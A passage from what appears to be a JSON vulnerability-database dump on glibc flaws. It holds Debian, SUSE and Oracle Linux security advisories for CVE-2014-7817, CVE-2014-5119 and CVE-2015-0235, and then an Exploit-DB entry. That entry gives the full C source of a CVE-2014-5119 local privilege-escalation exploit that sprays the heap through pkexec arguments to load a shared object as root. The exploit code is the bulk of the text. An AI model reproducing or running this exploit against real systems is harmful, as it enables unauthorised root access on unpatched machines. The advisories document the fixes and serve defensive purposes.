for BZ #14134 in commit\n 6e230d11837f3ae7b375ea69d7905f0d18eb79e5.\n\nCVE-2014-7817\n\n The function wordexp() fails to properly handle the WRDE_NOCMD\n flag when processing arithmetic inputs in the form of "$((... ``))"\n where "..." can be anything valid. The backticks in the arithmetic\n epxression are evaluated by in a shell even if WRDE_NOCMD forbade\n command substitution. This allows an attacker to attempt to pass\n dangerous commands via constructs of the above form, and bypass\n the WRDE_NOCMD flag. This patch fixes this by checking for WRDE_NOCMD\n in exec_comm(), the only place that can execute a shell. All other\n checks for WRDE_NOCMD are superfluous and removed.\n\n", "modified": "2014-11-29T19:00:34", "published": "2014-11-29T19:00:34", "id": "DEBIAN:DLA-97-1:B684D", "href": "https://lists.debian.org/debian-lts-announce/2014/debian-lts-announce-201411/msg00015.html", "title": "[SECURITY] [DLA 97-1] eglibc security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-30T02:21:41", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3142-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nJanuary 27, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : eglibc\nCVE ID : CVE-2012-6656 CVE-2014-6040 CVE-2014-7817 CVE-2015-0235\n\nSeveral vulnerabilities have been fixed in eglibc, Debian's version of\nthe GNU C library:\n\nCVE-2015-0235\n\n Qualys discovered that the gethostbyname and gethostbyname2\n functions were subject to a buffer overflow if provided with a\n crafted IP address argument. This could be used by an attacker to\n execute arbitrary code in processes which called the affected\n functions.\n\n The original glibc bug was reported by Peter Klotz.\n\nCVE-2014-7817\n\n Tim Waugh of Red Hat discovered that the WRDE_NOCMD option of the\n wordexp function did not suppress command execution in all cases.\n This allows a context-dependent attacker to execute shell\n commands.\n\nCVE-2012-6656\nCVE-2014-6040\n\n The charset conversion code for certain IBM multi-byte code pages\n could perform an out-of-bounds array access, causing the process\n to crash. In some scenarios, this allows a remote attacker to\n cause a persistent denial of service.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 2.13-38+deb7u7.\n\nFor the upcoming stable distribution (jessie) and the unstable\ndistribution (sid), the CVE-2015-0235 issue has been fixed in version\n2.18-1 of the glibc package.\n\nWe recommend that you upgrade your eglibc packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2015-01-27T15:39:21", "published": "2015-01-27T15:39:21", "id": "DEBIAN:DSA-3142-1:A3964", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2015/msg00025.html", "title": "[SECURITY] [DSA 3142-1] eglibc security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:22:03", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3012-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nAugust 27, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : eglibc\nCVE ID : CVE-2014-5119\n\nTavis Ormandy discovered a heap-based buffer overflow in the\ntransliteration module loading code in eglibc, Debian's version of the\nGNU C Library. As a result, an attacker who can supply a crafted\ndestination character set argument to iconv-related character\nconversation functions could achieve arbitrary code execution.\n\nThis update removes support of loadable gconv transliteration modules.\nBesides the security vulnerability, the module loading code had\nfunctionality defects which prevented it from working for the intended\npurpose.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 2.13-38+deb7u4.\n\nWe recommend that you upgrade your eglibc packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2014-08-27T05:51:39", "published": "2014-08-27T05:51:39", "id": "DEBIAN:DSA-3012-1:04A85", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00197.html", "title": "[SECURITY] [DSA 3012-1] eglibc security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-24T22:39:17", "bulletinFamily": "unix", "description": "Package : eglibc\nVersion : 2.11.3-4+deb6u1\nCVE ID : CVE-2014-0475 CVE-2014-5119\n\nCVE-2014-0475\n\n Stephane Chazelas discovered that the GNU C library, glibc, processed\n ".." path segments in locale-related environment variables, possibly\n allowing attackers to circumvent intended restrictions, such as\n ForceCommand in OpenSSH, assuming that they can supply crafted locale\n settings.\n\nCVE-2014-5119\n\n Tavis Ormandy discovered a heap-based buffer overflow in the\n transliteration module loading code in eglibc, Debian's version of the\n GNU C Library. As a result, an attacker who can supply a crafted\n destination character set argument to iconv-related character\n conversation functions could achieve arbitrary code execution.\n\n This update removes support of loadable gconv transliteration modules.\n Besides the security vulnerability, the module loading code had\n functionality defects which prevented it from working for the intended\n purpose.\n\n", "modified": "2014-09-02T18:16:47", "published": "2014-09-02T18:16:47", "id": "DEBIAN:DLA-43-1:D57FA", "href": "https://lists.debian.org/debian-lts-announce/2014/debian-lts-announce-201409/msg00000.html", "title": "[DLA 43-1] eglibc security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2016-09-04T11:17:43", "bulletinFamily": "unix", "description": "glibc was updated to fix three security issues:\n\n - A directory traversal in locale environment handling was fixed\n (CVE-2014-0475, bnc#887022, GLIBC BZ #17137)\n\n - Disable gconv transliteration module loading which could be used for\n code execution (CVE-2014-5119, bnc#892073, GLIBC BZ #17187)\n\n - Fix crashes on invalid input in IBM gconv modules (CVE-2014-6040,\n bnc#894553, BZ #17325)\n\n", "modified": "2014-09-11T09:04:39", "published": "2014-09-11T09:04:39", "id": "OPENSUSE-SU-2014:1115-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00009.html", "type": "suse", "title": "glibc (important)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:57:20", "bulletinFamily": "unix", "description": "This glibc update fixes a critical privilege escalation problem and the\n following security and non-security issues:\n\n * bnc#892073: An off-by-one error leading to a heap-based buffer\n overflow was found in __gconv_translit_find(). An exploit that\n targets the problem is publicly available. (CVE-2014-5119)\n * bnc#882600: Copy filename argument in\n posix_spawn_file_actions_addopen. (CVE-2014-4043)\n * bnc#860501: Use O_LARGEFILE for utmp file.\n * bnc#842291: Fix typo in glibc-2.5-dlopen-lookup-race.diff.\n * bnc#839870: Fix integer overflows in malloc. (CVE-2013-4332)\n * bnc#834594: Fix readdir_r with long file names. (CVE-2013-4237)\n * bnc#824639: Drop lock before calling malloc_printerr.\n * bnc#801246: Fix buffer overrun in regexp matcher. (CVE-2013-0242)\n * bnc#779320: Fix buffer overflow in strcoll. (CVE-2012-4412)\n * bnc#894556 / bnc#894553: Fix crashes on invalid input in IBM gconv\n modules. (CVE-2014-6040, CVE-2012-6656, bnc#894553, bnc#894556,\n BZ#17325, BZ#14134)\n\n Security Issues:\n\n * CVE-2014-5119\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5119\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5119</a>>\n * CVE-2014-4043\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4043\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4043</a>>\n * CVE-2013-4332\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4332\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4332</a>>\n * CVE-2013-4237\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4237\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4237</a>>\n * CVE-2013-0242\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0242\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0242</a>>\n * CVE-2012-4412\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4412\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4412</a>>\n\n\n", "modified": "2014-09-15T19:04:18", "published": "2014-09-15T19:04:18", "id": "SUSE-SU-2014:1128-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00019.html", "title": "Security update for glibc (important)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:40:16", "bulletinFamily": "unix", "description": "This glibc update fixes a critical privilege escalation problem and two\n non-security issues:\n\n * bnc#892073: An off-by-one error leading to a heap-based buffer\n overflow was found in __gconv_translit_find(). An exploit that\n targets the problem is publicly available. (CVE-2014-5119)\n * bnc#892065: setenv-alloca.patch: Avoid unbound alloca in setenv.\n * bnc#888347: printf-multibyte-format.patch: Don't parse %s format\n argument as multi-byte string.\n\n Security Issues:\n\n * CVE-2014-5119\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5119\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5119</a>>\n\n", "modified": "2014-09-13T03:04:16", "published": "2014-09-13T03:04:16", "id": "SUSE-SU-2014:1125-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00017.html", "type": "suse", "title": "Security update for glibc (important)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:35", "bulletinFamily": "unix", "description": "[2.17-78.0.1]\n- Remove strstr and strcasestr implementations using sse4.2 instructions.\n- Upstream commits 584b18eb4df61ccd447db2dfe8c8a7901f8c8598 and\n 1818483b15d22016b0eae41d37ee91cc87b37510 backported.\n[2.17-78]\n- Fix ppc64le builds (#1077389).\n[2.17-77]\n- Fix parsing of numeric hosts in gethostbyname_r (CVE-2015-0235, #1183545).\n[2.17-76]\n- Fix application crashes during calls to gettimeofday on ppc64\n when kernel exports gettimeofday via VDSO (#1077389).\n- Prevent NSS-based file backend from entering infinite loop\n when different APIs request the same service (CVE-2014-8121, #1182272).\n[2.17-75]\n- Fix permission of debuginfo source files to allow multiarch\n debuginfo packages to be installed and upgraded (#1170110).\n[2.17-74]\n- Fix wordexp() to honour WRDE_NOCMD (CVE-2014-7817, #1170487).\n[2.17-73]\n- ftell: seek to end only when there are unflushed bytes (#1156331).\n[2.17-72]\n- [s390] Fix up _dl_argv after adjusting arguments in _dl_start_user (#1161666).\n[2.17-71]\n- Fix incorrect handling of relocations in 64-bit LE mode for Power\n (#1162847).\n[2.17-70]\n- [s390] Retain stack alignment when skipping over loader argv (#1161666).\n[2.17-69]\n- Use __int128_t in link.h to support older compiler (#1120490).\n[2.17-68]\n- Revert to defining __extern_inline only for gcc-4.3+ (#1120490).\n[2.17-67]\n- Correct a defect in the generated math error table in the manual (#786638).\n[2.17-66]\n- Include preliminary thread, signal and cancellation safety documentation\n in manual (#786638).\n[2.17-65]\n- PowerPC 32-bit and 64-bit optimized function support using STT_GNU_IFUNC\n (#731837).\n- Support running Intel MPX-enabled applications (#1132518).\n- Support running Intel AVX-512-enabled applications (#1140272).\n[2.17-64]\n- Fix crashes on invalid input in IBM gconv modules (#1140474, CVE-2014-6040).\n[2.17-63]\n- Build build-locale-archive statically (#1070611).\n- Return failure in getnetgrent only when all netgroups have been searched\n (#1085313).\n[2.17-62]\n- Don't use alloca in addgetnetgrentX (#1138520).\n- Adjust pointers to triplets in netgroup query data (#1138520).\n[2.17-61]\n- Set CS_PATH to just /use/bin (#1124453).\n- Add systemtap probe in lll_futex_wake for ppc and s390 (#1084089).\n[2.17-60]\n- Add mmap usage to malloc_info output (#1103856).\n- Fix nscd lookup for innetgr when netgroup has wildcards (#1080766).\n- Fix memory order when reading libgcc handle (#1103874).\n- Fix typo in nscd/selinux.c (#1125306).\n- Do not fail if one of the two responses to AF_UNSPEC fails (#1098047).\n[2.17-59]\n- Provide correct buffer length to netgroup queries in nscd (#1083647).\n- Return NULL for wildcard values in getnetgrent from nscd (#1085290).\n- Avoid overlapping addresses to stpcpy calls in nscd (#1083644).\n- Initialize all of datahead structure in nscd (#1083646).\n[2.17-58]\n- Remove gconv transliteration loadable modules support (CVE-2014-5119,\n - _nl_find_locale: Improve handling of crafted locale names (CVE-2014-0475,\n[2.17-57]\n- Merge 64-bit ARM (AArch64) support (#1027179).\n- Fix build failure for rtkaio/tst-aiod2.c and rtkaio/tst-aiod3.c.\n[2.17-56]\n- Merge LE 64-bit POWER support (#1125513).\n[2.17-55.4]\n- Fix tst-cancel4, tst-cancelx4, tst-cancel5, and tst-cancelx5 for all targets.\n- Fix tst-ildoubl, and tst-ldouble for POWER.\n- Allow LE 64-bit POWER to build with VSX if enabled (#1124048).\n[2.17-55.3]\n- Fix ppc64le ABI issue with pthread_atfork being present in libpthread.so.0.\n[2.17-55.2]\n- Add ABI baseline for 64-bit POWER LE.\n[2.17-55.1]\n- Add 64-bit POWER LE support.", "modified": "2015-03-09T00:00:00", "published": "2015-03-09T00:00:00", "id": "ELSA-2015-0327", "href": "http://linux.oracle.com/errata/ELSA-2015-0327.html", "title": "glibc security and bug fix update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:41", "bulletinFamily": "unix", "description": "[2.12-1.149.4]\n- Fix recursive dlopen() (#1173469).\n[2.12-1.149.3]\n- Fix typo in res_send and res_query (#rh1172023).\n[2.12-1.149.2]\n- Fix crashes on invalid input in IBM gconv modules (CVE-2014-6040, #1139571).\n[2.12-1.149.1]\n- Fix wordexp() to honour WRDE_NOCMD (CVE-2014-7817, #1170121).", "modified": "2015-01-07T00:00:00", "published": "2015-01-07T00:00:00", "id": "ELSA-2015-0016", "href": "http://linux.oracle.com/errata/ELSA-2015-0016.html", "title": "glibc security and bug fix update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:34:57", "bulletinFamily": "unix", "description": "[2.12-1.132.4]\n- Remove gconv transliteration loadable modules support (CVE-2014-5119,\n - _nl_find_locale: Improve handling of crafted locale names (CVE-2014-0475,", "modified": "2014-08-29T00:00:00", "published": "2014-08-29T00:00:00", "id": "ELSA-2014-1110", "href": "http://linux.oracle.com/errata/ELSA-2014-1110.html", "title": "glibc security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T21:09:50", "bulletinFamily": "exploit", "description": "glibc Off-by-One NUL Byte gconv_translit_find Exploit. CVE-2014-5119. Local exploit for linux platform", "modified": "2014-08-27T00:00:00", "published": "2014-08-27T00:00:00", "id": "EDB-ID:34421", "href": "https://www.exploit-db.com/exploits/34421/", "type": "exploitdb", "title": "glibc - Off-by-One NUL Byte gconv_translit_find Exploit", "sourceData": "//\r\n// Full Exploit: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34421.tar.gz (CVE-2014-5119.tar.gz)\r\n//\r\n//\r\n// ---------------------------------------------------\r\n// CVE-2014-5119 glibc __gconv_translit_find() exploit\r\n// ------------------------ taviso & scarybeasts -----\r\n//\r\n// Tavis Ormandy <taviso@cmpxhg8b.com>\r\n// Chris Evans <scarybeasts@gmail.com>\r\n//\r\n// Monday 25th August, 2014\r\n//\r\n\r\n#define _GNU_SOURCE\r\n#include <err.h>\r\n#include <stdio.h>\r\n#include <fcntl.h>\r\n#include <errno.h>\r\n#include <dlfcn.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <stdint.h>\r\n#include <assert.h>\r\n#include <stdarg.h>\r\n#include <stddef.h>\r\n#include <signal.h>\r\n#include <string.h>\r\n#include <termios.h>\r\n#include <stdbool.h>\r\n#include <sys/user.h>\r\n#include <sys/stat.h>\r\n#include <sys/ioctl.h>\r\n#include <sys/types.h>\r\n#include <sys/ptrace.h>\r\n#include <sys/utsname.h>\r\n#include <sys/resource.h>\r\n\r\n// Minimal environment to trigger corruption in __gconv_translit_find().\r\nstatic char * const kCorruptCharsetEnviron[] = {\r\n \"CHARSET=//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\",\r\n NULL,\r\n};\r\n\r\nstatic const struct rlimit kRlimMax = {\r\n .rlim_cur = RLIM_INFINITY,\r\n .rlim_max = RLIM_INFINITY,\r\n};\r\n\r\nstatic const struct rlimit kRlimMin = {\r\n .rlim_cur = 1,\r\n .rlim_max = 1,\r\n};\r\n\r\n// A malloc chunk header.\r\ntypedef struct {\r\n size_t prev_size;\r\n size_t size;\r\n uintptr_t fd;\r\n uintptr_t bk;\r\n uintptr_t fd_nextsize;\r\n uintptr_t bk_nextsize;\r\n} mchunk_t;\r\n\r\n// A tls_dtor_list node.\r\ntypedef struct {\r\n uintptr_t func;\r\n uintptr_t obj;\r\n uintptr_t map;\r\n uintptr_t next;\r\n} dlist_t;\r\n\r\n// The known_trans structure glibc uses for transliteration modules.\r\ntypedef struct {\r\n uint8_t info[32];\r\n char *fname;\r\n void *handle;\r\n int open_count;\r\n} known_t;\r\n\r\nenum {\r\n LOG_DEBUG,\r\n LOG_WARN,\r\n LOG_ERROR,\r\n LOG_FATAL,\r\n};\r\n\r\n// Round up an integer to the next PAGE_SIZE boundary.\r\nstatic inline uintptr_t next_page_size(uintptr_t size)\r\n{\r\n return (size + PAGE_SIZE - 1) & PAGE_MASK;\r\n}\r\n\r\n// Allocate a buffer of specified length, starting with s, containing c, terminated with t.\r\nstatic void * alloc_repeated_string(size_t length, int s, int c, int t)\r\n{\r\n return memset(memset(memset(malloc(length), t, length), c, length - 1), s, 1);\r\n}\r\n\r\nstatic void logmessage(int level, const char * format, ...)\r\n{\r\n va_list ap;\r\n\r\n switch (level) {\r\n case LOG_DEBUG: fprintf(stderr, \"[*] \"); break;\r\n case LOG_WARN: fprintf(stderr, \"[*] \"); break;\r\n case LOG_ERROR: fprintf(stderr, \"[!] \"); break;\r\n }\r\n\r\n va_start(ap, format);\r\n vfprintf(stderr, format, ap);\r\n va_end(ap);\r\n\r\n fputc('\\n', stderr);\r\n\r\n if (level == LOG_ERROR) {\r\n _exit(EXIT_FAILURE);\r\n }\r\n}\r\n\r\n// Parse a libc malloc assertion message to extract useful pointers.\r\n//\r\n// Note, this isn't to defeat ASLR, it just makes it more portable across\r\n// different system configurations. ASLR is already nullified using rlimits,\r\n// although technically even that isn't necessary.\r\nstatic int parse_fatal_error(uintptr_t *chunkptr, uintptr_t *baseaddr, uintptr_t *bssaddr, uintptr_t *libcaddr)\r\n{\r\n FILE *pty;\r\n char *mallocerror;\r\n char *memorymap;\r\n char *line;\r\n char *prev;\r\n char message[1 << 14];\r\n char *anon = NULL;\r\n char r, w, x, s;\r\n ssize_t count;\r\n int status;\r\n uintptr_t mapstart;\r\n uintptr_t mapend;\r\n\r\n // Unfortunately, glibc writes it's error messaged to /dev/tty. This cannot\r\n // be changed in setuid programs, so this wrapper catches tty output.\r\n while (true) {\r\n // Reset any previous output.\r\n memset(message, 0, sizeof message);\r\n\r\n logmessage(LOG_DEBUG, \"Attempting to invoke pseudo-pty helper (this will take a few seconds)...\");\r\n\r\n if ((pty = popen(\"./pty\", \"r\")) == NULL) {\r\n logmessage(LOG_ERROR, \"failed to execute pseudo-pty helper utility, cannot continue\");\r\n }\r\n\r\n if ((count = fread(message, 1, sizeof message, pty)) <= 0) {\r\n logmessage(LOG_ERROR, \"failed to read output from pseudo-pty helper, %d (%m)\", count, message);\r\n }\r\n\r\n logmessage(LOG_DEBUG, \"Read %u bytes of output from pseudo-pty helper, parsing...\", count);\r\n\r\n pclose(pty);\r\n\r\n mallocerror = strstr(message, \"corrupted double-linked list\");\r\n memorymap = strstr(message, \"======= Memory map: ========\");\r\n\r\n // Unfortunately this isn't reliable, keep trying until it works.\r\n if (mallocerror == NULL || memorymap == NULL) {\r\n logmessage(LOG_WARN, \"expected output missing (this is normal), trying again...\");\r\n continue;\r\n }\r\n\r\n logmessage(LOG_DEBUG, \"pseudo-pty helper succeeded\");\r\n break;\r\n }\r\n\r\n *baseaddr = 0;\r\n *chunkptr = 0;\r\n *bssaddr = 0;\r\n *libcaddr = 0;\r\n\r\n logmessage(LOG_DEBUG, \"attempting to parse libc fatal error message...\");\r\n\r\n // Verify this is a message we understand.\r\n if (!mallocerror || !memorymap) {\r\n logmessage(LOG_ERROR, \"unable to locate required error messages in crash dump\");\r\n }\r\n\r\n // First, find the chunk pointer that malloc doesn't like\r\n if (sscanf(mallocerror, \"corrupted double-linked list: %p ***\", chunkptr) != 1) {\r\n logmessage(LOG_ERROR, \"having trouble parsing this error message: %.20s\", mallocerror);\r\n };\r\n\r\n logmessage(LOG_DEBUG, \"discovered chunk pointer from `%.20s...`, => %p\", mallocerror, *chunkptr);\r\n logmessage(LOG_DEBUG, \"attempting to parse the libc maps dump...\");\r\n\r\n // Second, parse maps.\r\n for (prev = line = memorymap; line = strtok(line, \"\\n\"); prev = line, line = NULL) {\r\n char filename[32];\r\n\r\n // Reset filename.\r\n memset(filename, 0, sizeof filename);\r\n\r\n // Just ignore the banner printed by glibc.\r\n if (strcmp(line, \"======= Memory map: ========\") == 0) {\r\n continue;\r\n }\r\n\r\n if (sscanf(line, \"%08x-%08x %c%c%c%c %*8x %*s %*u %31s\", &mapstart, &mapend, &r, &w, &x, &s, filename) >= 1) {\r\n // Record the last seen anonymous map, in case the kernel didn't tag the heap.\r\n if (strlen(filename) == 0) {\r\n anon = line;\r\n }\r\n\r\n // If the kernel did tag the heap, then everything is easy.\r\n if (strcmp(filename, \"[heap]\") == 0) {\r\n logmessage(LOG_DEBUG, \"successfully located first morecore chunk w/tag @%p\", mapstart);\r\n *baseaddr = mapstart;\r\n }\r\n\r\n // If it didn't tag the heap, then we need the anonymous chunk before the stack.\r\n if (strcmp(filename, \"[stack]\") == 0 && !*baseaddr) {\r\n logmessage(LOG_WARN, \"no [heap] tag was found, using heuristic...\");\r\n if (sscanf(anon, \"%08x-%*08x %*c%*c%*c%*c %*8x %*s %*u %31s\", baseaddr, filename) < 1) {\r\n logmessage(LOG_ERROR, \"expected to find heap location in line `%s`, but failed\", anon);\r\n }\r\n logmessage(LOG_DEBUG, \"located first morecore chunk w/o tag@%p\", *baseaddr);\r\n }\r\n\r\n if (strcmp(filename, \"/usr/lib/libc-2.18.so\") == 0 && x == 'x') {\r\n logmessage(LOG_DEBUG, \"found libc.so mapped @%p\", mapstart);\r\n *libcaddr = mapstart;\r\n }\r\n\r\n // Try to find libc bss.\r\n if (strlen(filename) == 0 && mapend - mapstart == 0x102000) {\r\n logmessage(LOG_DEBUG, \"expecting libc.so bss to begin at %p\", mapstart);\r\n *bssaddr = mapstart;\r\n }\r\n continue;\r\n }\r\n\r\n logmessage(LOG_ERROR, \"unable to parse maps line `%s`, quiting\", line);\r\n break;\r\n }\r\n\r\n return (*chunkptr == 0 || *baseaddr == 0 || *bssaddr == 0 || *libcaddr == 0) ? 1 : 0;\r\n}\r\n\r\nstatic const size_t heap_chunk_start = 0x506c8008;\r\nstatic const size_t heap_chunk_end = 0x506c8008 + (2 * 1024 * 1024);\r\n\r\nstatic const size_t nstrings = 15840000;\r\n\r\n// The offset into libc-2.18.so BSS of tls_dtor_list.\r\nstatic const uintptr_t kTlsDtorListOffset = 0x12d4;\r\n\r\n// The DSO we want to load as euid 0.\r\nstatic const char kExploitDso[] = \"./exploit.so\";\r\n\r\nint main(int argc, const char* argv[])\r\n{\r\n uintptr_t baseaddr;\r\n uintptr_t chunkptr;\r\n uintptr_t bssaddr;\r\n uintptr_t libcaddr;\r\n uint8_t *param;\r\n char **args;\r\n dlist_t *chain;\r\n struct utsname ubuf;\r\n\r\n // Look up host type.\r\n if (uname(&ubuf) != 0) {\r\n logmessage(LOG_ERROR, \"failed to query kernel information\");\r\n }\r\n\r\n logmessage(LOG_DEBUG, \"---------------------------------------------------\");\r\n logmessage(LOG_DEBUG, \"CVE-2014-5119 glibc __gconv_translit_find() exploit\");\r\n logmessage(LOG_DEBUG, \"------------------------ taviso & scarybeasts -----\");\r\n\r\n // Print some warning that this isn't going to work on Ubuntu.\r\n if (access(\"/etc/fedora-release\", F_OK) != 0 || strcmp(ubuf.machine, \"i686\") != 0)\r\n logmessage(LOG_WARN, \"This proof of concept is designed for 32 bit Fedora 20\");\r\n\r\n // Extract some useful pointers from glibc error output.\r\n if (parse_fatal_error(&chunkptr, &baseaddr, &bssaddr, &libcaddr) != 0) {\r\n logmessage(LOG_ERROR, \"unable to parse libc fatal error message, please try again.\");\r\n }\r\n\r\n logmessage(LOG_DEBUG, \"allocating space for argument structure...\");\r\n\r\n // This number of \"-u\" arguments is used to spray the heap.\r\n // Each value is a 59-byte string, leading to a 64-byte heap chunk, leading to a stable heap pattern.\r\n // The value is just large enough to usuaully crash the heap into the stack without going OOM.\r\n if ((args = malloc(((nstrings * 2 + 3) * sizeof(char *)))) == NULL) {\r\n logmessage(LOG_ERROR, \"allocating argument structure failed\");\r\n }\r\n\r\n logmessage(LOG_DEBUG, \"creating command string...\");\r\n\r\n args[nstrings * 2 + 1] = alloc_repeated_string(471, '/', 1, 0);\r\n args[nstrings * 2 + 2] = NULL;\r\n\r\n logmessage(LOG_DEBUG, \"creating a tls_dtor_list node...\");\r\n\r\n // The length 59 is chosen to cause a 64byte allocation by stdrup. That is\r\n // a 60 byte nul-terminated string, followed by 4 bytes of metadata.\r\n param = alloc_repeated_string(59, 'A', 'A', 0);\r\n chain = (void *) param;\r\n\r\n logmessage(LOG_DEBUG, \"open_translit() symbol will be at %p\", libcaddr + _OPEN_TRANSLIT_OFF);\r\n logmessage(LOG_DEBUG, \"offsetof(struct known_trans, fname) => %u\", offsetof(known_t, fname));\r\n\r\n chain->func = libcaddr + _OPEN_TRANSLIT_OFF;\r\n chain->obj = baseaddr + 8 + sizeof(*chain) - 4 - offsetof(known_t, fname);\r\n chain->map = baseaddr + 8 + sizeof(*chain);\r\n chain->next = baseaddr + 8 + 59 - strlen(kExploitDso);\r\n\r\n logmessage(LOG_DEBUG, \"appending `%s` to list node\", kExploitDso);\r\n\r\n memcpy(param + 59 - strlen(kExploitDso), kExploitDso, 12);\r\n\r\n logmessage(LOG_DEBUG, \"building parameter list...\");\r\n for (int i = 0; i < nstrings; ++i) {\r\n args[i*2 + 1] = \"-u\";\r\n args[i*2 + 2] = (void *) chain;\r\n }\r\n\r\n // Verify we didn't sneak in a NUL.\r\n assert(memchr(chain, 0, sizeof(chain)) == NULL);\r\n\r\n logmessage(LOG_DEBUG, \"anticipating tls_dtor_list to be at %p\", bssaddr + kTlsDtorListOffset);\r\n\r\n // Spam all of possible chunks (some are unfortunately missed).\r\n for (int i = 0; true; i++) {\r\n uintptr_t chunksize = 64;\r\n uintptr_t chunkaddr = baseaddr + i * chunksize;\r\n uintptr_t targetpageoffset = chunkptr & ~PAGE_MASK;\r\n uintptr_t chunkpageoffset = PAGE_MASK;\r\n uintptr_t mmapbase = 31804 + ((0xFD8 - targetpageoffset) / 32);\r\n uint8_t *param = NULL;\r\n mchunk_t chunk = {\r\n .prev_size = 0xCCCCCCCC,\r\n .size = 0xDDDDDDDD,\r\n .fd_nextsize = bssaddr + kTlsDtorListOffset - 0x14,\r\n .bk_nextsize = baseaddr + 8,\r\n };\r\n\r\n // Compensate for heap metadata every 1MB of allocations.\r\n chunkaddr += 8 + (i / (1024 * 1024 / chunksize - 1) * chunksize);\r\n\r\n if (chunkaddr < heap_chunk_start)\r\n continue;\r\n\r\n if (chunkaddr > heap_chunk_end)\r\n break;\r\n\r\n chunkpageoffset = chunkaddr & ~PAGE_MASK;\r\n\r\n if (chunkpageoffset > targetpageoffset) {\r\n continue;\r\n }\r\n\r\n if (targetpageoffset - chunkpageoffset > chunksize) {\r\n continue;\r\n }\r\n\r\n // Looks like this will fit, compensate the pointers for alignment.\r\n chunk.fd = chunk.bk = chunkaddr + (targetpageoffset - chunkpageoffset);\r\n\r\n if (memchr(&chunk, 0, sizeof chunk)) {\r\n logmessage(LOG_WARN, \"parameter %u would contain a nul, skipping\", i);\r\n continue;\r\n }\r\n args[mmapbase + i * 2] = param = alloc_repeated_string(60, 'A', 'A', 0);\r\n\r\n memcpy(param + (targetpageoffset - chunkpageoffset),\r\n &chunk,\r\n sizeof chunk);\r\n }\r\n\r\n setrlimit(RLIMIT_STACK, &kRlimMax);\r\n setrlimit(RLIMIT_DATA, &kRlimMin);\r\n\r\n args[0] = \"pkexec\";\r\n\r\n logmessage(LOG_DEBUG, \"execvpe(%s...)...\", args[0]);\r\n execvpe(\"pkexec\", args, kCorruptCharsetEnviron);\r\n}\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": 